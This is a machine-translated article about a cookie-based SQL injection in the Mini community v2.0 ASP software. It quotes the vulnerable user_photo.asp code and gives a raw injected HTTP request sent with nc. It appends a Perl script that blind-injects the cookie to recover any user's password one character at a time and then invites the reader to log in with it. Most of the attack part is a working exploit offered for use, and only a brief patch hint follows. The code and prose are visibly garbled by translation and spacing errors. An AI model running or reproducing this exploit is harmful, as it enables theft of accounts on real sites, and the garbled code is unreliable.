SQL injection Using Cookies

Http://www.spking.com/mix/

The SQL injection vulnerability occurs in ASP programs. Generally, the SQL injection vulnerability is injected by submitting carefully crafted addresses from the address bar. In fact, SQL injection can also be implemented in Cookies. This vulnerability involves the free version of Mini community v2.0 + SP1 Patch.

The Mini city community is Region. Due to the large number of problem files, a simple user_photo.asp is selected here for explanation.

The role of the user_photo.asp file is to upload the user's profile picture. First, let's see how the file starts to verify that the user has logged in:

If Request. Cookies ("NC") = "" or Request. Cookies ("NC") = "guest" then
Response. Write ("sorry, you are not a community user. Please register first! ")
Response. End
End if

Here, he simply uses the value of the NC variable in Cookies, whether it is not empty or not "guest" to determine the user. It is the first mistake that a user does not have a password for the database. Next, let's look at the Code:

Set rs = server. createobject ("adodb. recordset ")
Set rsw.conn.exe cute ("Select * from HY Where NC =" & Request. Cookies ("NC ")&"")

The first two sentences are his second errors. when any data obtained from Cookies ("NC") is filtered, it is directly put into an SQL statement for query. By constructing Cookies, you can perform SQL injection here!

Some code is omitted.

"Width =" 200 "height =" 150 ">

In the code that follows, the user calls user_photo_disp.asp to display the image based on the data previously queried from the database. If the first query statement returns normally, the image is displayed normally (1 ); otherwise, an error is displayed. With this phenomenon, we can determine whether the SQL statements we have constructed are correct or not.

Figure 1

Well, a brief review of the three Analysis Steps just now is also a prerequisite for any SQL injection vulnerability being established:
1. The ASP program can run smoothly on wrong statements without damaging the data we have built.
2. Be able to control the composition of SQL statements and insert the required SQL statement components.
3. Check whether the SQL statement is correctly executed in the data returned by the client (browser ).

After the vulnerability analysis is completed, the following is a simple practice process. Due to the special nature of Cookies, it is generally used for brute force guesses. Hacker (Internet Swiss Army Knife) to demonstrate the process, the text is accompanied by a perl script written by the author, can be used to guess any account password, use the first registered with a user name goo account.

The detailed user guide for Nc.exe can be found on the Internet, so I will not talk about it more. Run nc-vv 127.0.0.1 80 <1.txt> 1.htm character in the command line. The data is constructed as follows. Note that there are three carriage returns after the last semicolon.

GET/mcity/main. asp HTTP/1.0.
Host: 127.0.0.1
Cookie: NC = goo % 27and % 20 exists (select % 20id % 20 from % 20HY % 20 where % 20len (MM) % 3D0% 27and % 20NC % 3D % 27 admin % 27) % 20and % 20% 271;

 

We include the NC data in Cookies into SQL statements to see what we want to execute:
Select * from HY Where NC = gooand exists (select id from HY where len (MM) = 7 and NC = admin) and '1

Obviously, we are trying to check whether the password length with the username admin is 7. You can use your thinking abilities to construct other SQL statements for query. In the format of 1.txt, replace = (equal sign) with % 3D, replace (single quotes) with % 27, and replace spaces with % 20. If the preceding statement is correct, the browser returns "1" and "2.

Figure 2

In fact, when I tested the official website of the Mini city community, I found that most of the SQL injection vulnerabilities have been solved, but the patches have not been released. Any friends who are using this community had to change it by themselves, and Replace all the places where the Request function is used in the following format (Request. cookies ("NC"), "", "") are removed (single quotes) to make it more difficult to exploit the vulnerability. It is still a good solution to this problem.

 

Appendix:
#! /Usr/bin/perl
# Codz By Mix2003/8/15
# The Script can crack MINI system users password

$ | = 1;
Use Socket;
Use Getopt: Std;
Getopt (hpwu );

Print "============================================ ================== ";
Print "The Script Codz By Mix ";
Print "============================================ ================== ";

& Usage unless (defined ($ opt_h) & defined ($ opt_w ));

$ Host = $ opt_h;
$ Port = $ opt_p | 80;
$ Way = $ opt_w;
$ Username = $ opt_u;

Print "Please wait ...";

@ Dic = (0 .. 20 );
For ($ I = 0; $ I <@ dic; $ I ++)
{
$ Cookies = "NC = goo % 27and % 20 exists (select % 20id % 20 from % 20HY % 20 where % 20len (MM) % 3D $ dic [$ I] % 20and % 20NC % 3D % 27 $ username % 27) % 20and % 20% ";
$ Request = "GET $ way HTTP/1.0 ".
"Host: $ host ".
"Cookie: $ cookies ;";
Print "$ dic [$ I].";
@ In = sendraw ($ request );
@ Num = grep/the image can be/, @ in;
$ Size = @ num;
If ($ size> 0 ){
$ Len = $ dic [$ I];
Print "Successful, The len of admins password is $ dic [$ I].";
Last;
}
}

For ($ j = 1; $ j <= $ len; $ j ++)
{
@ Dic11 = (0 .. 9 );
@ Dic12 = (a. z );
@ Dic13 = (A. Z );
@ Special = qw ('~ ! @ # $ % 25 ^ % 26 * () _ % 2b =-{} []: "; <>? | ,./\);
@ Special = qw ('~ ! • # ￥ % ......-* () -- +-= {} []: ""; "? │ ,. // <> /,〈〉);
@ Dic = (@ dic11, @ dic12, @ dic13, @ special, @ special );
For ($ I = 0; $ I <@ dic; $ I ++)
{
$ Key = $ pws. $ dic [$ I];
$ Cookies = "NC = goo % 27and % 20 exists % 20 (select % 20id % 20 from % 20HY % 20 where % 20 left (MM, $ j) % 3D % 27 $ key % 27% 20and % 20NC % 3D % 27 $ username % 27) % 20and % 20% ";

$ Request = "GET $ way HTTP/1.0 ".
"Host: $ host ".
"Cookie: $ cookies ;";
Print "$ dic [$ I].";
@ In = sendraw ($ request );
@ Num = grep/the image can be/, @ in;
$ Size = @ num;
If ($ size> 0 ){
$ Th = $ j. th;
Print "Successful, The $ th word of the password is $ dic [$ I]";
$ Pws = $ pws. $ dic [$ I];
Last;
}
}
}

$ Pws = ~ S/\ % 2b/+/ig;
$ Pws = ~ S/\ % 25/\ %/ig;
$ Pws = ~ S/\ % 26/&/ig;
Print "Successful, The $ usernames password is $ pws .";

Print "Now, you can use username: $ usernamepassword: $ pwsto login! ";

Sub usage {
Print qq ~
Usage: $0-h [-p]-w
-H = hostname you want to crack
-P = port, 80 default
-W = the path of the weak file and the files path
-U = you want to crack users name

Eg: $0-h www.target.com-p 80-w/mcity/user_photo.asp-u admin
~;
Exit;
}

# Thanx rfps sendraw
Sub sendraw {
My ($ request) = @_;
My $ target;
$ Target = inet_aton ($ host) | die ("inet_aton problems ");
Socket (S, PF_INET, SOCK_STREAM, getprotobyname (tcp) | 0) | die ("Socket problems ");
If (connect (S, pack "Snail 4x8", 2, $ port, $ target )){
Select (S );
$ | = 1;
Print $ request;
My @ in =;
Select (STDOUT );
Close (S );
Return @ in;
}
Else {
Die ("Cant connect ...");
}
}